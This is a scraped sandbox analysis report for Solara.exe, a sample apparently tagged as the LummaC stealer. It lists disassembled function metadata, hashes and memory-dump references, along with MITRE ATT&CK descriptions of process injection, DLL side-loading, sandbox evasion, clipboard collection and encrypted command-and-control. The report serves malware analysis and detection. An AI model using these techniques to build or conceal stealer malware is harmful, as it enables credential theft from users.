Associated: 00000001.00000002.1828508644.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828528698.0000000000CBA000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828562373.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c20000_Solara.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: 13f53288ef58ed022d369f5123daf44e8acad5c2c2a08fcecd544ce5b8ffeff3
Instruction ID: f279689c5540c79b1ba1252f39526aee35038b6df020f21c1e6a19d2c0e7e1f1
Opcode Fuzzy Hash: 13f53288ef58ed022d369f5123daf44e8acad5c2c2a08fcecd544ce5b8ffeff3
Instruction Fuzzy Hash: E2F0C73650012ABBCF221FD5DC09B9E3F26FB0A3A5F044110FE1996571D73289A0EBD1

Function 0043C952 Relevance: 6.0, APIs: 4, Instructions: 25COMMON

Download Yara Rule

APIs

SysFreeString.OLEAUT32(?), ref: 0043C95B
SysFreeString.OLEAUT32(?), ref: 0043C960
SysFreeString.OLEAUT32(?), ref: 0043C979
SysFreeString.OLEAUT32(?), ref: 0043C97E

Memory Dump Source

Source File: 00000001.00000002.1828328186.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Solara.jbxd

Similarity

API ID: FreeString
String ID:
API String ID: 3341692771-0
Opcode ID: 7513e40abce2683c0f9875052ac9dd6cda1d204f60d4def54d90547febcd212e
Instruction ID: b96013b1363d6de582764c9147e42d707290ad78c484f990cbbe7c665502bef7
Opcode Fuzzy Hash: 7513e40abce2683c0f9875052ac9dd6cda1d204f60d4def54d90547febcd212e
Instruction Fuzzy Hash: 05D0E935050A44EBCB227B61DE058067BB2FFC57553164838E155134318775F835DF45

Function 00C8A284 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 291COMMON

Download Yara Rule

APIs

__aulldiv.LIBCMT ref: 00C8A3FB

Strings

+, xrefs: 00C8A359
-, xrefs: 00C8A34C

Memory Dump Source

Source File: 00000001.00000002.1828463139.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000001.00000002.1828447607.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828508644.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828528698.0000000000CBA000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828562373.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c20000_Solara.jbxd

Similarity

API ID: __aulldiv
String ID: +$-
API String ID: 3732870572-2137968064
Opcode ID: cda346dd4674985bdf08c3b03dfe51d17944bf8a7ab055efd559bbad2b7b6b67
Instruction ID: 79f07826f1a5071ca94497c0caa71f534d802d069f098aaf2446cd2f9c7115a8
Opcode Fuzzy Hash: cda346dd4674985bdf08c3b03dfe51d17944bf8a7ab055efd559bbad2b7b6b67
Instruction Fuzzy Hash: 87A12530D00258AFEF24EE69C8507EE7BA0EF55328F14855BE8749B291D270DA02DB5A

Function 00C4E2E0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 184COMMON

Download Yara Rule

APIs

__aulldiv.LIBCMT ref: 00C4E447

Strings

-, xrefs: 00C4E475
0123456789abcdefghijklmnopqrstuvwxyz, xrefs: 00C4E3A5, 00C4E3DC, 00C4E3E1

Memory Dump Source

Source File: 00000001.00000002.1828463139.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000001.00000002.1828447607.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828508644.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828528698.0000000000CBA000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828562373.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c20000_Solara.jbxd

Similarity

API ID: __aulldiv
String ID: -$0123456789abcdefghijklmnopqrstuvwxyz
API String ID: 3732870572-1956417402
Opcode ID: eb6445508ec8178ab08732ab4faa48335fcf8b0ba1adb121f50e6c782904266e
Instruction ID: 95a6984235b668ec3b42f5a4d7d57d36e2e26959588431f248d836e1d7bfb18e
Opcode Fuzzy Hash: eb6445508ec8178ab08732ab4faa48335fcf8b0ba1adb121f50e6c782904266e
Instruction Fuzzy Hash: 8851F470E04259AFDF268FBE84857BEBFF9BF05310F168469E4A1D7251D2748A418B50

Function 00C22F86 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 126COMMON

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 00C22F8D
_strlen.LIBCMT ref: 00C22FA5

Strings

input string: , xrefs: 00C22FA0, 00C2306B

Memory Dump Source

Source File: 00000001.00000002.1828463139.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000001.00000002.1828447607.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828508644.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828528698.0000000000CBA000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828562373.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c20000_Solara.jbxd

Similarity

API ID: H_prolog3_catch_strlen
String ID: input string:
API String ID: 3133806014-2984214493
Opcode ID: 289562c34b058e96ac54cc0409d2effac0e0aad2505a6f12a1dea24212267e39
Instruction ID: d5efee6835f4eb392dbfc782e253ce021f648f5fb70a83590fdce19923133818
Opcode Fuzzy Hash: 289562c34b058e96ac54cc0409d2effac0e0aad2505a6f12a1dea24212267e39
Instruction Fuzzy Hash: 5D419975B002649FC720EB98E9859ACBBF1BF48720F244299E524977D1CB759E83CB70

Function 00C596A5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 71COMMONLIBRARYCODE

Download Yara Rule

APIs

DName::DName.LIBVCRUNTIME ref: 00C596BC
DName::DName.LIBVCRUNTIME ref: 00C59741

Strings

A, xrefs: 00C59721

Memory Dump Source

Source File: 00000001.00000002.1828463139.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000001.00000002.1828447607.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828508644.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828528698.0000000000CBA000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828562373.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c20000_Solara.jbxd

Similarity

API ID: NameName::
String ID: A
API String ID: 1333004437-3554254475
Opcode ID: c4b54b76e7381d0a4862e8f594472aec13d6fc94d9e5238991c957bae1ba34da
Instruction ID: ccc61a98005737215b52b046d30c115833b16e345dd2c3c587f1c5d2c4e46325
Opcode Fuzzy Hash: c4b54b76e7381d0a4862e8f594472aec13d6fc94d9e5238991c957bae1ba34da
Instruction Fuzzy Hash: 75217C78900208EFDF00DFA4D851AAD7B71EB08341F18809AF8559B262DB319ACADB48

Function 00C2A416 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 57COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 00C2A41D

Strings

false, xrefs: 00C2A474
true, xrefs: 00C2A487

Memory Dump Source

Source File: 00000001.00000002.1828463139.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000001.00000002.1828447607.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828508644.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828528698.0000000000CBA000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828562373.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c20000_Solara.jbxd

Similarity

API ID: H_prolog3_
String ID: false$true
API String ID: 2427045233-2658103896
Opcode ID: c462ce06bffdcdc859fcff1b31207bd82d7e624931fcca45f075f8c7961a3619
Instruction ID: 15928a1b0bffc05d2b85262ccdd1c5b513dbbd2b016d0ff5764b6ae9e9d021c3
Opcode Fuzzy Hash: c462ce06bffdcdc859fcff1b31207bd82d7e624931fcca45f075f8c7961a3619
Instruction Fuzzy Hash: C511E2B5901754AFCB20EFB4E841B8ABBF4BF05300F04856AF1A58BA51EBB0E508DB51

Function 00C21803 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 33COMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00C2180A
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00C21842

Part of subcall function 00C267B5: _Yarn.LIBCPMT ref: 00C267D4
Part of subcall function 00C267B5: _Yarn.LIBCPMT ref: 00C267F8

Strings

bad locale name, xrefs: 00C21850

Memory Dump Source

Source File: 00000001.00000002.1828463139.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000001.00000002.1828447607.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828508644.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828528698.0000000000CBA000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828562373.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c20000_Solara.jbxd

Similarity

API ID: Yarnstd::_$Locinfo::_Locinfo_ctorLockitLockit::_
String ID: bad locale name
API String ID: 1908188788-1405518554
Opcode ID: 6299b79563800ab578a81b269d6cd00c662efe1a8847b986a3372ef499b28b47
Instruction ID: 919a678f6bceec02c8a29e57b2a8936e4bcc4b3cbf0d9501f01003dc0e41874c
Opcode Fuzzy Hash: 6299b79563800ab578a81b269d6cd00c662efe1a8847b986a3372ef499b28b47
Instruction Fuzzy Hash: 19F01772545B509F83309F7AA481443FBE4BE283107948E2FE1DEC3E11D730A404CB6A

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Solara.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: LummaC

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Possible Origin

Network Behavior

Suricata IDS Alerts

Network Port Distribution

Windows Analysis Report
Solara.exe

Function 00D0FABD Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 295
threadinjectionmemoryCOMMON

Function 00C22606 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 142
memorysynchronizationthreadCOMMON

Function 00C9799C Relevance: .0, Instructions: 22
COMMONLIBRARYCODE

Function 00C8B7D9 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74
COMMONLIBRARYCODE

Function 00C92299 Relevance: 4.7, APIs: 3, Instructions: 202
COMMON

Function 00C86DA1 Relevance: 4.5, APIs: 3, Instructions: 15
COMMONLIBRARYCODE

Function 00C966E1 Relevance: 3.2, APIs: 2, Instructions: 177
COMMON

Function 00C8BF5F Relevance: 3.0, APIs: 2, Instructions: 34
COMMONLIBRARYCODE

Function 00C96283 Relevance: 1.6, APIs: 1, Instructions: 147
COMMON

Function 00C8B8A4 Relevance: 1.6, APIs: 1, Instructions: 57
COMMONLIBRARYCODE